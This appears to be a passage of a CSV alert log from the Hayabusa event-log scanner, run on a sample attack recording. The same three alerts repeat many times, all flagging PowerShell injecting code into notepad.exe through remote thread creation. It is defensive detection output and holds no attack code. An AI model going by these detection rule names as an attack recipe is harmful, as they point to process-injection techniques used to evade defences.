2019-05-19 02:16:16.473 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.489 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.505 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.520 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.536 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.551 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.583 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.598 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.614 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.630 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.661 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.692 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.708 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.723 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.739 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.755 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.770 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.801 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.817 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.833 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.848 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.864 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.880 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
